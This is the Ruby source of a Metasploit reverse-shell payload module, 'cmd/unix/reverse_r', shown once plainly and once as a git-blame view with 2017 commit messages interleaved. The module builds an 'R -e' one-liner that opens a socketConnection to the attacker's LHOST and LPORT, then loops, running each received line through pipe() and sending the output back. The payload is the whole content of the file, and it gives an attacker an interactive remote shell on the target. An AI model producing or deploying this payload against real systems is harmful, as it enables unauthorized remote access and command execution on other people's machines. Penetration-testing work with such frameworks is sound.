metasploit-framework/modules/payloads/singles/cmd/unix/reverse_r.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/payload/r'
require 'msf/core/handler/reverse_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'

module MetasploitModule

  CachedSize = 157

  include Msf::Payload::Single
  include Msf::Payload::R
  include Msf::Sessions::CommandShellOptions

  def initialize(info = {})
    super(merge_info(info,
      'Name'        => 'Unix Command Shell, Reverse TCP (via R)',
      'Description' => 'Connect back and create a command shell via R',
      'Author'      => [ 'RageLtMan' ],
      'License'     => MSF_LICENSE,
      'Platform'    => 'unix',
      'Arch'        => ARCH_CMD,
      'Handler'     => Msf::Handler::ReverseTcp,
      'Session'     => Msf::Sessions::CommandShell,
      'PayloadType' => 'cmd',
      'RequiredCmd' => 'R',
      'Payload'     => { 'Offsets' => {}, 'Payload' => '' }
    ))
  end

  def generate
    return prepends(r_string)
  end

  def prepends(r_string)
   return "R -e \"#{r_string}\""
  end

  def r_string
    lhost = datastore['LHOST']
    lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
    return "s<-socketConnection(host='#{lhost}',port=#{datastore['LPORT']}," +
    "blocking=TRUE,server=FALSE,open='r+');while(TRUE){writeLines(readLines" +
    "(pipe(readLines(s, 1))),s)}"
  end
end
Unix cmd versions of R payloads Use R to connect back from a unix shell. Notes: We need to DRY this up - tons of copy pasta here, when we should really be instantiating the language specific payloads and just wrapping them with CLI execution strings. Testing: None, yet, just did the quick port to wrap this and push to CI now that rex-arch #4 is in. 2017-08-21 01:25:57 +00:00			`##`
			`# This module requires Metasploit: https://metasploit.com/download`
			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core/payload/r'`
			`require 'msf/core/handler/reverse_tcp'`
			`require 'msf/base/sessions/command_shell'`
			`require 'msf/base/sessions/command_shell_options'`

			`module MetasploitModule`

update R cached sizes 2017-08-28 10:30:30 +00:00			`CachedSize = 157`
Unix cmd versions of R payloads Use R to connect back from a unix shell. Notes: We need to DRY this up - tons of copy pasta here, when we should really be instantiating the language specific payloads and just wrapping them with CLI execution strings. Testing: None, yet, just did the quick port to wrap this and push to CI now that rex-arch #4 is in. 2017-08-21 01:25:57 +00:00
			`include Msf::Payload::Single`
			`include Msf::Payload::R`
			`include Msf::Sessions::CommandShellOptions`

			`def initialize(info = {})`
			`super(merge_info(info,`
			`'Name' => 'Unix Command Shell, Reverse TCP (via R)',`
			`'Description' => 'Connect back and create a command shell via R',`
			`'Author' => [ 'RageLtMan' ],`
			`'License' => MSF_LICENSE,`
provide missing bits for R platform 2017-08-23 21:58:48 +00:00			`'Platform' => 'unix',`
			`'Arch' => ARCH_CMD,`
Unix cmd versions of R payloads Use R to connect back from a unix shell. Notes: We need to DRY this up - tons of copy pasta here, when we should really be instantiating the language specific payloads and just wrapping them with CLI execution strings. Testing: None, yet, just did the quick port to wrap this and push to CI now that rex-arch #4 is in. 2017-08-21 01:25:57 +00:00			`'Handler' => Msf::Handler::ReverseTcp,`
			`'Session' => Msf::Sessions::CommandShell,`
provide missing bits for R platform 2017-08-23 21:58:48 +00:00			`'PayloadType' => 'cmd',`
			`'RequiredCmd' => 'R',`
Unix cmd versions of R payloads Use R to connect back from a unix shell. Notes: We need to DRY this up - tons of copy pasta here, when we should really be instantiating the language specific payloads and just wrapping them with CLI execution strings. Testing: None, yet, just did the quick port to wrap this and push to CI now that rex-arch #4 is in. 2017-08-21 01:25:57 +00:00			`'Payload' => { 'Offsets' => {}, 'Payload' => '' }`
			`))`
			`end`

			`def generate`
			`return prepends(r_string)`
			`end`

			`def prepends(r_string)`
			`return "R -e \"#{r_string}\""`
Address msftidy complaint 2017-08-21 07:39:03 +00:00			`end`
Unix cmd versions of R payloads Use R to connect back from a unix shell. Notes: We need to DRY this up - tons of copy pasta here, when we should really be instantiating the language specific payloads and just wrapping them with CLI execution strings. Testing: None, yet, just did the quick port to wrap this and push to CI now that rex-arch #4 is in. 2017-08-21 01:25:57 +00:00
			`def r_string`
			`lhost = datastore['LHOST']`
			`lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)`
add missing quotes 2017-08-21 21:16:03 +00:00			`return "s<-socketConnection(host='#{lhost}',port=#{datastore['LPORT']}," +`
Unix cmd versions of R payloads Use R to connect back from a unix shell. Notes: We need to DRY this up - tons of copy pasta here, when we should really be instantiating the language specific payloads and just wrapping them with CLI execution strings. Testing: None, yet, just did the quick port to wrap this and push to CI now that rex-arch #4 is in. 2017-08-21 01:25:57 +00:00			`"blocking=TRUE,server=FALSE,open='r+');while(TRUE){writeLines(readLines" +`
			`"(pipe(readLines(s, 1))),s)}"`
			`end`
			`end`